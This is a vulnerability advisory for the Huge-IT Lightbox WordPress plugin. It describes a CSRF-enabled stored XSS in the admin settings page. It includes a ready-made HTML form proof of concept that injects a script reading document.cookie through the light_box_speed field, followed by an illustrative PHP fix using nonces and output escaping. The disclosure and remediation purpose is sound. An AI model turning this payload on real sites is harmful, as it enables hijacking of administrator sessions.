Homepage: https://wordpress.org/plugins/lightbox/
Overview: Due to a lack of CSRF mitigation and of HTML entity encoding in the output generated by /admin/view/huge_it_light_box.php, an attacker who lures a logged-in administrator to a crafted page can store a script in the plugin's settings, which then executes in the context of an admin user when the settings page is rendered.
CVSS Score: 4.8
CVSS Vector: (AV:N/AC:M/Au:N/C:P/I:P/A:N/E:F/RL:OF/RC:C)
Versions Affected: 1.6.6 and below
Solution: Upgrade to version 1.6.8
Proof of Concept:

    <form action="http://[target]/wp-admin/admin.php?page=huge_it_light_box&hugeit_task=save" method="post">
      <input type="text" name="light_box_speed" value=""><script>alert(document.cookie)</script>">
      <input type="text" name="light_box_style" value="1" />
      <input type="text" name="light_box_transition" value="elastic" />
      <input type="text" name="light_box_fadeout" value="300" />
      <input type="text" name="light_box_title" value="false" />
      <input type="text" name="params[light_box_opacity]" value="20" />
      <input type="text" name="params[light_box_open]" value="false" />
      <input type="text" name="params[light_box_overlayclose]" value="false" />
      <input type="text" name="params[light_box_overlayclose]" value="true" />
      <input type="text" name="params[light_box_esckey]" value="false" />
      <input type="text" name="params[light_box_arrowkey]" value="false" />
      <input type="text" name="params[light_box_loop]" value="false" />
      <input type="text" name="params[light_box_loop]" value="true" />
      <input type="text" name="params[light_box_closebutton]" value="false" />
      <input type="text" name="params[light_box_closebutton]" value="true" />
      <input type="text" name="params[light_box_fixed]" value="false" />
      <input type="text" name="params[light_box_fixed]" value="true" />
      <input type="text" name="params[slider_title_position]" value="5" />
      <input type="text" name="params[light_box_size_fix]" value="false" />
      <input type="text" name="params[light_box_width]" value="500" />
      <input type="text" name="params[light_box_height]" value="500" />
      <input type="text" name="params[light_box_maxwidth]" value="768" />
      <input type="text" name="params[light_box_maxheight]" value="500" />
      <input type="text" name="params[light_box_initialwidth]" value="300" />
      <input type="text" name="params[light_box_initialheight]" value="100" />
      <input type="text" name="params[light_box_slideshow]" value="false" />
      <input type="text" name="params[light_box_slideshowspeed]" value="2500" />
      <input type="text" name="params[light_box_slideshowauto]" value="false" />
      <input type="text" name="params[light_box_slideshowauto]" value="true" />
      <input type="text" name="params[light_box_slideshowstart]" value="start slideshow" />
      <input type="text" name="params[light_box_slideshowstop]" value="stop slideshow" />
      <input type="text" name="params[watermarket_image]" value="false" />
      <input type="text" name="params[watermark_width]" value="0" />
      <input type="text" name="params[watermark_transparency]" value="0" />
      <input type="submit" value="submit">
    </form>
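The two missing controls named in the Overview (a CSRF token on the save request and entity encoding on output) look like this in a WordPress settings handler. This is an added illustration, not the plugin's code; the function, option and nonce names prefixed hugeit_lb_ are assumptions, and only the light_box_speed field from the PoC is shown.

```php
<?php
// Added example, not the plugin's own code. The hugeit_lb_* function, option
// and nonce names are assumptions chosen for illustration.

// Settings page: emit a nonce bound to the save action, and run the stored
// value through esc_attr() so a value such as "><script>...</script> cannot
// close the attribute and inject markup when the page is rendered.
function hugeit_lb_render_settings_page() {
    if ( ! current_user_can( 'manage_options' ) ) {
        wp_die( 'Insufficient privileges.', 'Forbidden', array( 'response' => 403 ) );
    }
    $speed = get_option( 'hugeit_lb_speed', 300 );
    ?>
    <form method="post"
          action="<?php echo esc_url( admin_url( 'admin.php?page=huge_it_light_box&hugeit_task=save' ) ); ?>">
        <?php wp_nonce_field( 'hugeit_lb_save_settings', 'hugeit_lb_nonce' ); ?>
        <input type="text" name="light_box_speed" value="<?php echo esc_attr( $speed ); ?>">
        <?php submit_button(); ?>
    </form>
    <?php
}

// Save handler: a forged cross-site form cannot carry a valid nonce, so the
// nonce check stops the CSRF half of the issue; the capability check stops a
// low-privileged user from reaching the handler at all.
function hugeit_lb_handle_save() {
    if ( ! isset( $_POST['hugeit_lb_nonce'] )
         || ! wp_verify_nonce( $_POST['hugeit_lb_nonce'], 'hugeit_lb_save_settings' ) ) {
        wp_die( 'Invalid or missing nonce.', 'Forbidden', array( 'response' => 403 ) );
    }
    if ( ! current_user_can( 'manage_options' ) ) {
        wp_die( 'Insufficient privileges.', 'Forbidden', array( 'response' => 403 ) );
    }
    // Validate on input as well: the speed is a non-negative integer, so any
    // markup in the submitted value is discarded before it is ever stored.
    $speed = isset( $_POST['light_box_speed'] ) ? absint( $_POST['light_box_speed'] ) : 300;
    update_option( 'hugeit_lb_speed', $speed );
}

// Route the save task to the handler (assumed wiring for this example).
add_action( 'admin_init', function () {
    if ( isset( $_GET['page'], $_GET['hugeit_task'] )
         && 'huge_it_light_box' === $_GET['page'] && 'save' === $_GET['hugeit_task'] ) {
        hugeit_lb_handle_save();
    }
} );
```

Either control alone would have blocked the PoC above: without the nonce the forged POST is rejected, and with esc_attr() on output the stored payload is rendered as literal text rather than a script element.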